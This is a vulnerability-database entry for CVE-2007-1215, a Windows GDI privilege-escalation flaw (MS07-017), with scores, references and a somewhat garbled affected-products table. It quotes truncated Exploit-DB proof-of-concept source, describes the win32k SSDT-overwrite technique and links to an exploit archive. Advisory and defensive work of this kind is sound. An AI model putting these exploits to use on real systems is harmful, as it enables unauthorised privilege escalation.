CVE-2007-1215
published 2007-04-04CVE-2007-1215: Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4; XP SP2; Server 2003 Gold, SP1, and SP2; and Vista allows local users to…
PriorityP432high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
2.72%
84.2th percentile
Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4; XP SP2; Server 2003 Gold, SP1, and SP2; and Vista allows local users to gain privileges via certain "color-related parameters" in crafted images.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)
exploitdb·2007-04-26
CVE-2007-1215 Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)
Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)
---
MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3804.zip (04262007-gdi_remote_elevation_privilege_exploit_ms07_017_principal.zip)
# milw0rm.com [2007-04-26]
Exploit-DB
Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)
exploitdb·2007-04-17
CVE-2007-1215 Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)
Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)
---
/*
GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017)
Coded by Lionel d'Hauenens
http://www.labo-asso.com
Development:
Dev-C++ 4.9.9.2
Linked with /lib/libgdi32.a
References:
http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx
http://research.eeye.com/html/alerts/zeroday/20061106.html
http://www.milw0rm.com/exploits/3688
http://ivanlef0u.free.fr/?p=41
March 16, 2007
*/
#include
#include
#include
typedef enum _SECTION_INFORMATION_CLASS
{
SectionBasicInformation,
SectionImageInformation
} SECTION_INFORMATION_CLASS;
typedef struct _SECTION_BASIC_INFORMATION {
ULONG Base;
ULONG Attributes;
LARGE_INTEGER Size;
} SECTION_BASIC_INFORMATION;
typedef struct _GDI_TABLE_ENTRY
{
PVOID pKernelInfo;
WOR
Exploit-DB
Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)
exploitdb·2007-04-08
CVE-2007-1215 Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)
Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)
---
#define _WIN32_WINNT 0x0500
#include
#include
#include
#pragma comment (lib, "user32.lib")
#pragma comment (lib, "gdi32.lib")
#pragma comment (lib, "shlwapi.lib")
#pragma comment (lib, "ntdll.lib")
/*
Here is a sploit for the GDI MS07-017 Local Privilege Escalation, presented during the last blackhat conferences
by Joel Ericksson. Modify the GdiTable of the current process and by calling good API's changean entry of the
win32k's SSDT by 0x2.
before :
lkd> dps bf998300 L 2
bf998300 bf934921 win32k!NtGdiAbortDoc
bf998304 bf94648d win32k!NtGdiAbortPath
after :
lkd> dps bf998300 L 2
bf998300 00000002
bf998304 bf94648d win32k!NtGdiAbortPath
win32k.sys bDeleteBrush (called by DeleteObject)
mov esi, [edx] ;esi=pKernelInfo
cmp
No writeups or analysis indexed.
http://www.securityfocus.com/archive/1/466186/100/200/threadedhttp://www.securityfocus.com/bid/23273http://www.securitytracker.com/id?1017847http://www.vupen.com/english/advisories/2007/1215https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-017https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1927http://www.securityfocus.com/archive/1/466186/100/200/threadedhttp://www.securityfocus.com/bid/23273http://www.securitytracker.com/id?1017847http://www.vupen.com/english/advisories/2007/1215https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-017https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1927
2007-04-04
Published